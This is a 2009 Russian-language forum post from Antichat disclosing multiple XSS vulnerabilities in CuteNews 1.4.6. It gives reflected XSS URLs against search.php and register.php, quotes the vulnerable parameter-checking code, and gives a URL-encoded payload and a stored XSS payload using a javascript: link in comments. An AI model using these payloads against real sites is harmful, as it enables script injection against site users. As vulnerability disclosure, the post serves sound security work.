
21.08.2009, 22:24
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
CuteNews 1.4.6 / Множественные XSS
CuteNews 1.4.6 / Множественные XSS
1. Пассивные XSS:
Во всех формах в action указывается $PHP_SELF, что делает скрипт уязвимым:
Код:
http://test1.ru/cutenews/search.php/1"><script>alert();</script>
http://test1.ru/cutenews/register.php/"><script>alert();</script>/?action=lostpass
ну и т.д.
Далее в файле /search.php наблюдаем следующий код:
PHP код:
//check for bad _GET and _POST
if($dosearch == "yes"){
$check_params = array_merge($_GET, $_POST);
foreach($check_params as $param_key=>$param_val){
if( !empty($param_val) && !preg_match('/^[a-zA-Z0-9\- ]{0,255}$/', $param_val) ){
die("Error! the parameter '$param_key' contains illigal characters");
}
}
}
а именно строчку: die("Error! the parameter '$param_key' contains illigal characters");
<script>alert();</script> ---> %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3B%3 C%2F%73%63%72%69%70%74%3E
Код:
http://test1.ru/cutenews/search.php?dosearch=yes&%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%29%3B%3C%2F%73%63%72%69%70%74%3E=.
2. Активная XSS:
В комментах пишем:
[link=javascript :alert()]text[/link]
P.S. двиг изобилует кривизной кода.
© Grey
Последний раз редактировалось Grey; 26.08.2009 в 11:19..
|
|
|